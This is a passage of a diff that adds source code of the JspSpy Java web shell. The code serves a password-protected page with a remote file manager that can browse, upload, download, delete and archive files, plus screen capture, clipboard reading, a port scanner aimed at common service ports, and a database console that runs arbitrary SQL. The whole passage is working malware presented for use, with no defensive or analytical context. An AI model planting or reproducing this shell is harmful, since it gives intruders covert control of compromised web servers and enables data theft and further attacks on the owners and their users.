+"		this.currentDir = '"+JSession.getAttribute(CURRENT_DIR)+"';"+
+"		this.filename = obj.filename;"+
+"		this.path = obj.path;"+
+"		this.filetype = obj.filetype;"+
+"	};"+
+"	fso.prototype = {"+
+"		copy:function(){"+
+"			var path = prompt('Copy To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'copy',src:this.path,to:path});"+
+"		},"+
+"		move:function() {"+
+"			var path =prompt('Move To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'move',src:this.path,to:path})"+
+"		},"+
+"		vEdit:function() {"+
+"			doPost({o:'vEdit',filepath:this.path})"+
+"		},"+
+"		down:function() {"+
+"			doPost({o:'down',path:this.path})"+
+"		},"+
+"		removedir:function() {"+
+"			if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"+
+"			doPost({o:'removedir',dir:this.path});"+
+"		},"+
+"		mkdir:function() {"+
+"			var name = prompt('Input New Directory Name','');"+
+"			if (name == null || name.trim().length == 0)return;"+
+"			doPost({o:'mkdir',name:name});"+
+"		},"+
+"		subdir:function() {"+
+"			doPost({o:'filelist',folder:this.path})"+
+"		},"+
+"		parent:function() {"+
+"			var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"+
+"			doPost({o:'filelist',folder:parent})"+
+"		},"+
+"		createFile:function() {"+
+"			var path = prompt('Input New File Name','');"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'vCreateFile',filepath:path})"+
+"		},"+
+"		deleteBatch:function() {"+
+"			if (!confirm('Are You Sure To Delete These Files?')) return;"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			doPost({o:'deleteBatch',files:selected.join(',')})"+
+"		},"+
+"		packBatch:function() {"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"+
+"			if (savefilename == null || savefilename.trim().length == 0)return;"+
+"			doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"+
+"		},"+
+"		pack:function() {"+
+"			var tmpName = '';"+
+"			if (this.filename.indexOf('.') == -1) tmpName = this.filename;"+
+"			else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"+
+"			tmpName += '.zip';"+
+"			var path = this.path;"+
+"			var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"+
+"			if (name == null || path.trim().length == 0) return;"+
+"			doPost({o:'pack',packedfile:path,savefilename:name})"+
+"		},"+
+"		vEditProperty:function() {"+
+"			var path = this.path;"+
+"			doPost({o:'vEditProperty',filepath:path})"+
+"		},"+
+"		unpack:function() {"+
+"			var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'unpack',savepath:path,zipfile:this.path})"+
+"		}"+
+"	};"+
+"	function doPost(obj) {"+
+"		var form = document.forms[\"doForm\"];"+
+"		var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"+
+"		for (var pro in obj)"+
+"		{"+
+"			var input = document.createElement(\"input\");"+
+"			input.type = \"hidden\";"+
+"			input.name = pro;"+
+"			input.value = obj[pro];"+
+"			form.appendChild(input);"+
+"		}"+
+"		form.submit();"+
+"	}"+
+"</script>");	
+
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BeforeInvoker extends  DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<html><head><title>JspSpy Codz By - Ninty</title><style type=\"text/css\">"+
+"body,td{font: 12px Arial,Tahoma;line-height: 16px;}"+
+".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"+
+".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"+
+".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"+
+"a {color: #00f;text-decoration:underline;}"+
+"a:hover{color: #f00;text-decoration:none;}"+
+".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"+
+".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"+
+".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"+
+".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"+
+".head td span{font-weight:normal;}"+
+"form{margin:0;padding:0;}"+
+"h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"+
+"ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"+
+"u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"+
+".secho{height:400px;width:100%;overflow:auto;border:none}"+
+"</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class AfterInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("</body></html>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DeleteBatchInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (!Util.isEmpty(files)) {
+String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+String[] arr = files.split(",");
+for (String fs:arr) {
+File f = new File(currentDir,fs);
+f.delete();
+}
+}
+JSession.setAttribute(MSG,"Delete Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ClipBoardInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>System Clipboard &raquo;</h2>"+
+"<p><pre>");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("</pre>"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\"  />"+
+"        </p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VRemoteControlInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	var interval = null;"+
+"	function a(btn) {"+
+"		if (btn.value == \"Stop\")"+
+"		{"+
+"			sstopClick(btn);"+
+"		} else {"+
+"			startClick(btn);"+
+"		}"+
+"	}"+
+"	function startClick(btn){"+
+"		btn.value = \"Stop\";"+
+"		var pl = document.getElementById(\"pl\").value;"+
+"		interval = setInterval(function(){"+
+"			var img = document.getElementById(\"screen\");"+
+"			img.src = \""+SHELL_NAME+"?o=gc&rnd=\"+Math.random();"+
+"		},parseInt(pl)*1000);"+
+"	}"+
+"	function sstopClick(btn) {"+
+"		clearInterval(interval);"+
+"		btn.value = \"Start\";"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>Remote Control &raquo;</h2><input class=\"bt\" onclick=\"var img = document.getElementById('screen').src='"+SHELL_NAME+"?o=gc&rnd='+Math.random();\" name=\"getsc\" id=\"getsc\" value=\"Get Screen\" type=\"button\" size=\"100\"  />"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"a(this)\" value=\"Start\" type=\"button\" size=\"100\"  /> Speed(Second , dont be so fast)  <input type='text' value='3' size='5' id='pl' name='pl'/>  Can Not Control Yet."+
+"        <hr/><p><img id='screen' src='x'/></p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//GetScreen
+private static class GcInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
+Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight());
+BufferedImage img = new Robot().createScreenCapture(rec);
+response.setContentType("image/jpeg");
+ImageIO.write(img,"jpg",response.getOutputStream());
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VPortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+if (Util.isEmpty(ip))
+ip = "127.0.0.1";
+if (Util.isEmpty(ports))
+ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+if (Util.isEmpty(timeout)) 
+timeout = "2";
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"+
+"<div id=\"YwLB\"><form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"+
+"IP : <input name=\"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> Timeout 锛堢锛� : <input name=\"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+
+"</p>"+
+"</form></div>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class PortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+ins.get("vPortScan").invoke(request,response,JSession);
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+int iTimeout = 0;
+if (Util.isEmpty(ip) || Util.isEmpty(ports))
+return;
+if (!Util.isInteger(timeout)) {
+timeout = "2";
+}
+iTimeout = Integer.parseInt(timeout);
+Map<String,String> rs = new LinkedHashMap<String,String>();
+String[] portArr = ports.split(",");
+for (String port:portArr) {
+try {
+Socket s = new Socket();
+s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+s.close();
+rs.put(port,"Open");
+} catch (Exception e) {
+rs.put(port,"Close");
+}
+}
+out.println("<div style='margin:10px'>");
+Set<Map.Entry<String,String>> entrySet = rs.entrySet();
+for (Map.Entry<String,String> e:entrySet) {
+String port = e.getKey();
+String value = e.getValue();
+out.println(ip+" : "+port+" ................................. <font color="+(value.equals("Open")?"green":"red")+"><b>"+value+"</b></font><br>");
+}
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VConnInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object obj = JSession.getAttribute(DBO);
+if (obj == null || !((DBOperator)obj).isValid()) {
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(){"+
+"		var form = document.forms[\"form1\"];"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table><script>changeurldriver()</script>");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//DBConnect
+private static class DbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String driver = request.getParameter("driver");
+String url = request.getParameter("url");
+String uid = request.getParameter("uid");
+String pwd = request.getParameter("pwd");
+String sql = request.getParameter("sql");
+String selectDb = request.getParameter("selectDb");
+if (selectDb == null)
+selectDb = JSession.getAttribute("selectDb").toString();
+else
+JSession.setAttribute("selectDb",selectDb);
+Object dbo = JSession.getAttribute(DBO);
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+if (dbo != null)
+((DBOperator)dbo).close();
+dbo = new DBOperator(driver,url,uid,pwd,true);
+} else {
+if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+DBOperator oldDbo = (DBOperator)dbo;
+dbo = new DBOperator(driver,url,uid,pwd);
+if (!oldDbo.equals(dbo)) {
+((DBOperator)oldDbo).close();
+((DBOperator)dbo).connect();
+} else {
+dbo = oldDbo;
+}
+}
+} 
+DBOperator Ddbo = (DBOperator)dbo;
+JSession.setAttribute(DBO,Ddbo);
+Util.outMsg(out,"Connect To DataBase Success!");
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(selectDb){"+
+"		var form = document.forms[\"form1\"];"+
+"		if (selectDb){"+
+"			form.elements[\"db\"].selectedIndex = selectDb"+
+"		}"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""+selectDb+"\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" value=\""+Ddbo.driver+"\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" value=\""+Ddbo.url+"\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" value=\""+Ddbo.uid+"\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" value=\""+Ddbo.pwd+"\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form><script>changeurldriver('"+selectDb+"')</script>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"POST\">"+
+"<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Run SQL query/queries on database :</td></tr><tr><td><textarea name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"+Util.htmlEncode(Util.getStr(sql))+"</textarea></td><td style=\"padding:0 5px;\"><input class=\"bt\" style=\"height:50px;\" name=\"submit\" type=\"submit\" value=\"Query\" /></td></tr></table></p></form></table>");	
+} catch (Exception e) {
+//e.printStackTrace();
+throw e;
+}
+}
+}
+private static class ExecuteSQLInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String sql = request.getParameter("sql");
+String db = request.getParameter("selectDb");
+Object dbo = JSession.getAttribute(DBO);
+if (!Util.isEmpty(sql)) {
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+response.sendRedirect(SHELL_NAME+"?o=vConn");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+Object obj = ((DBOperator)dbo).execute(sql);
+if (obj instanceof ResultSet) {
+ResultSet rs = (ResultSet)obj;
+ResultSetMetaData meta = rs.getMetaData();
+int colCount = meta.getColumnCount();
+out.println("<div style='padding:10px'><p><b>Query#0 : "+Util.htmlEncode(sql)+"</b></p>");
+out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\"><tr class=\"head\">");
+for (int i=1;i<=colCount;i++) {
+out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>");
+}
+out.println("</tr>");
+Table tb = new Table();
+while(rs.next()) {
+Row r = new Row();
+for (int i = 1;i<=colCount;i++) {
+r.addColumn(new Column(rs.getString(i)));
+}
+tb.addRow(r);
+}
+out.println(tb.toString());
+out.println("</table></div>");
+rs.close();
+((DBOperator)dbo).closeStmt();
+} else {
+out.println("<div style='margin:10px'><h2>affected rows : <b>"+obj+"</b></h2></div>");
+}
+}
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VLoginInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<style type=\"text/css\">"+
+"	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+
+"a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+
+"	</style><form method=\"POST\" action=\""+SHELL_NAME+"\">"+
+"	  <p><span style=\"font:11px Verdana;\">Password: </span>"+
+"        <input name=\"o\" type=\"hidden\" value=\"login\">"+
+"        <input name=\"pw\" type=\"password\" size=\"20\">"+
+"        <input type=\"hidden\" name=\"o\" value=\"login\">"+
+"        <input type=\"submit\" value=\"Login\"><br/><br/>"+
+"	  "+
+"<span style=\"font:11px Verdana;\">Copyright &copy; 2009 NinTy </span><a href=\"http://www.forjj.com\" target=\"_blank\">www.Forjj.com</a></p>"+
+"    </form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class LoginInvoker extends DefaultInvoker{
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String inputPw = request.getParameter("pw");
+if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+} else {
+JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MyComparator implements Comparator<File>{
+public int compare(File f1,File f2) {
+if (f1 != null && f2!= null) {
+if (f1.isDirectory()) {
+if (f2.isDirectory()) {
+return f1.getName().compareTo(f2.getName());
+} else {
+return -1;
+}
+} else { 
+if (f2.isDirectory()) {
+return 1;
+} else {
+return  f1.getName().compareTo(f2.getName());
+}
+}
+}
+return 0;
+}
+}
+private static class FileListInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("folder");
+if (Util.isEmpty(path))
+path = JSession.getAttribute(CURRENT_DIR).toString();
+JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+File file = new File(path);
+if (!file.exists()) {
+throw new Exception(path+"Dont Exists !");
+}
+JSession.setAttribute(CURRENT_DIR,path);
+File[] list = file.listFiles();
+Arrays.sort(list,new MyComparator());
+out.println("<div style='margin:10px'>");
+String cr = null;
+try {
+cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+}catch(Exception e) {
+cr = "/";
+}
+File currentRoot = new File(cr);
+out.println("<h2>File Manager - Current disk &quot;"+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"&quot; total  (unknow) </h2>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"  <tr>"+
+"    <td nowrap>Current Directory  <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"+
+"	<td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""+JSession.getAttribute(CURRENT_DIR)+"\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"+
+"    <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"+
+"  </tr>"+
+"</table>"+
+"</form>");
+out.println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+
+"<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"+
+"<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" type=\"submit\" /></div>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir()\">Web Root</a>"+
+" | <a href=\"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir()\">Shell Directory</a>"+
+" | <a href=\"javascript:new fso({}).mkdir()\">New Directory</a> | <a href=\"javascript:new fso({}).createFile()\">New File</a>"+
+" | ");
+File[] roots = file.listRoots();
+for (int i = 0;i<roots.length;i++) {
+File r = roots[i];
+out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir();\">Disk("+Util.convertPath(r.getPath())+")</a>");
+if (i != roots.length -1) {
+out.println("|");
+} 
+}
+out.println("</td>"+
+"</tr></form>"+
+"<tr class=\"head\"><td>&nbsp;</td>"+
+"  <td>Name</td>"+
+"  <td width=\"16%\">Last Modified</td>"+
+"  <td width=\"10%\">Size</td>"+
+"  <td width=\"20%\">Read/Write/Execute</td>"+
+"  <td width=\"22%\">&nbsp;</td>"+
+"</tr>");
+if (file.getParent() != null) {
+out.println("<tr class=alt1>"+
+"<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"+
+"<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent</a></td>"+
+"</tr>");	
+}
+int dircount = 0;
+int filecount = 0;
+for (File f:list) {
+if (f.isDirectory()) {
+dircount ++;
+out.println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+
+"<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>--</td>"+
+"<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / unknow </td>"+
+"<td nowrap><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a></td>"+
+"</tr>");
+} else {
+filecount++;
+out.println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+
+"<td width=\"2%\" nowrap><input type='checkbox' value='"+f.getName()+"'/></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>"+Util.getSize(f.length(),'B')+"</td>"+
+"<td nowrap>"+
+""+f.canRead()+" / "+f.canWrite()+" / unknow </td>"+
+"<td nowrap>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property</a>");
+if (f.getName().endsWith(".zip")) {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack</a>");
+} else if (f.getName().endsWith(".rar")) {
+out.println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
+} else {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a>");
+}
+out.println("</td>"+
+"</tr>");
+}
+}
+out.println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"+
+"  <td><a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a></td>"+
+"  <td colspan=\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files</td></tr>"+
+"</table>");
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class LogoutInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object dbo = JSession.getAttribute(DBO);
